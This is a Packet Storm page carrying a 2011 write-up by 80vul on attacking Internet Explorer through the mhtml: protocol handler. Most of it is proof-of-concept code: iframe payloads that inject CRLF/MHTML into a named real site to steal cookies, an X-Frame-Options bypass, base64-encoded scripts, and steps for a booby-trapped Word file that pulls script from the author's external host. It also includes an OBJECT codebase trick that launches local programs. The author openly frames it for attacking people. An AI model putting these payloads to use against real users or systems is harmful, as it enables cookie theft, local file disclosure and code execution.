exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hacking With MHTML Protocol Handler

Hacking With MHTML Protocol Handler
Posted Jan 15, 2011
Authored by 80vul | Site 80vul.com

Write-up called Hacking with MHTML protocol handler. This discusses cross site scripting via uploading a mhtml file, cross site scripting via mthml-file string injection, bypassing X-Frame-Options, an Adobe Reader cross site scripting issue, and more.

tags | paper, protocol, xss
SHA-256 | e066afaa1cdd9d529b445023c4567bd6a1940243795411121723e91f3d01bde5

Hacking With MHTML Protocol Handler

Change Mirror Download
Hacking with mhtml protocol handler

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References:
http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt

Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally
released yesterday, There are two articles about the browser security[0x05
and 0x06].If the combination of both, we can complete a lot of interesting
attacks...

1.Cross Site Scripting by upload mhtml file

Using the mhtml protocol handler,The file extension is ignored.so the
attacker use renname the mhtml file to a *.jpg file,etc. then upload it to
the target site...

ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload
file format security restrictions

then use iframe tag src to it:

<iframe src="MHTML:http://target-site.com/upfile/demo.html!cookie"></iframe>

2.Cross Site Scripting mhtml-file string injection

the mhtml-file format is only base on CRLF,so if we can injection CRLF, the
site may be attacked.

poc:

test it on win7 system pls.

<iframe src="mhtml:
http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDs&callback=Content-Type%3A%20multipart%2Frelated%3B%20boundary%3D_boundary_by_mere%0D%0A%0D%0A--_boundary_by_mere%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APGJvZHk%2BDQo8aWZyYW1lIGlkPWlmciBzcmM9Imh0dHA6Ly93d3cuODB2dWwuY29tLyI%2BPC9pZnJhbWU%2BDQo8c2NyaXB0Pg0KYWxlcnQoZG9jdW1lbnQuY29va2llKTsNCmZ1bmN0aW9uIGNyb3NzY29va2llKCl7DQppZnIgPSBpZnIuY29udGVudFdpbmRvdyA%2FIGlmci5jb250ZW50V2luZG93IDogaWZyLmNvbnRlbnREb2N1bWVudDsNCmFsZXJ0KGlmci5kb2N1bWVudC5jb29raWUpDQp9DQpzZXRUaW1lb3V0KCJjcm9zc2Nvb2tpZSgpIiwxMDAwKTsNCjwvc2NyaXB0PjwvYm9keT4NCg%3D%3D%0D%0A--_boundary_by_mere--%0D%0A!cookie"></iframe>


if win-xp or win2k3 system,pls do it by the second urlencode.

mhtml-file string injection in JOSN file, some sites restrict the JOSN
file's Content-Type to defense xss. maybe we can use mhtml-file string
injection to pass it :)

3.bypass X-Frame-Options

X-Frame-Options did not protect the mhtml protocol handler.

the demo:

<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie"></iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php"></iframe>

4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul

Billy (BK) Rios introduced a very interesting approach to Steal local files
on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/)
,it used "Script src to local files in the LocalLow directory" by file://
+java apple +Adobe Reader+Adobe flash to complete it. but if used
mhtml+file://uncpath, so easy to do it.

Demo:

test it on win2k3+ie8+Adobe Reader 9

http://www.80vul.com/hackgame/xs-g0.php?username=Administrator


5.mhtml+file://uncpath+word == local xss vul

demo:http://www.80vul.com/mhtml/word.doc

download it, and save it on c:\word.doc and open it. u can get the alert
c:\boot.ini 's content.

this is base on "Microsoft word javascript execution"(
http://marc.info/?l=bugtraq&m=121121432823704&w=2).

to make the proof of concept follow the following steps:

1-Make a html file and paste xss code
2-Open the html file with the word and save as c:\word.xml
3-Open the word.xml with the notepad,and inject the mhtml code in <w:t>aaaaa
</w:t>
4-Rename c:\word.xml to c:\word.doc
5-Open c:\word.doc file

xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT>
aaaaa
----------------------------------------------------------

mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":

--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64

PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--

*/
--------------------------------------------------------

if u use this vul to attack someone,u need to known the word file path where
save the download file. and lots of guns used on the desktop :)

"Microsoft word javascript execution" is only work on office 2k3 and 2k7, In
other versions u can make the link, and src to
http://www.80vul.com/hackgame/word.htm

6. Coss Zone Scripting

First we would like to mention a very old vulnerability:

<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111
CODEBASE=c:/winnt/system32/calc.exe></OBJECT>

This vulnerability (by firebug9[
http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html])
allows you to execute any program on "My Computer" zone,Been tested and
found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3

Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change:

xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=mhtml:file://c:/word.doc!cookie></OBJECT>
aaaaa
----------------------------------------------------------

mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":

--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64

PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--

*/
--------------------------------------------------------


thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper.


About Ph4nt0m Webzine

Ph4nt0m Webzine is a free network Security Magazine,We accept articles in
English and Chinese, you are welcome contributions .
mailto:root_at_ph4nt0m.org pls.thank you!


--
hitest
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close